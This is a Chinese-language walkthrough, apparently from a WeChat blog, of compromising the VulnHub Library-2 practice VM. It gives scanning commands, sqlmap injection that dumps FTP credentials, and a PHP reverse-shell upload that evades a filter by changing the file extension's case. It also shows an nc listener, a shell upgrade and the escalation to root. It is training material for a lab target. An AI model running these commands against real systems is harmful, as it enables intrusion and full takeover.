本周实践的是vulnhub的Library-2镜像,
下载地址,https://download.vulnhub.com/thelibrary/Library-2.7z,
用workstation导入成功,
做地址扫描,sudo netdiscover -r 192.168.220.0/24,
获取到靶机地址是192.168.220.128,
接着做端口扫描,sudo nmap -sS -sV -T5 -A -p- 192.168.220.128,
发现靶机有21端口的ftp服务,80端口的http服务,
对http服务做php路径暴破,dirb http://192.168.220.128 -X .php,
获取到http://192.168.220.128/library.php,
用burpsuite访问,在页面上随便点击个国家,
把访问请求改成POST方式,保存到req.txt文件,
尝试SQL注入暴破,
sqlmap -r req.txt --dbs --batch --risk 3 --level 5,
获取到数据库library,
继续对数据库library进行暴破,
sqlmap -r req.txt -D library --dump-all --batch --risk 3 --level 5,
获取到ftp服务的用户名密码,globus/AroundTheWorld,
ftp登录靶机,ftp 192.168.220.128,
查看到当前是http服务主页面目录,而且可写,
本地准备反弹shell脚本文件,
cp /usr/share/webshells/php/php-reverse-shell.php shell.php,
上传put shell.php,发现不让,扩展名改成PHP,上传成功,
修改权限,chmod 777 shell.PHP,
kali攻击机上开启反弹shell监听,nc –lvp 4444,
浏览器访问http://192.168.220.128/shell.PHP,获取到反弹shell,
转成交互式shell,python -c 'import pty; pty.spawn("/bin/sh")',
查看到一个叫的welcome文件,里面有root的密码,secretPassword,
切到root,id确认没问题,
原文始发于微信公众号(云计算和网络安全技术实践):vulnhub之Library-2的实践
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论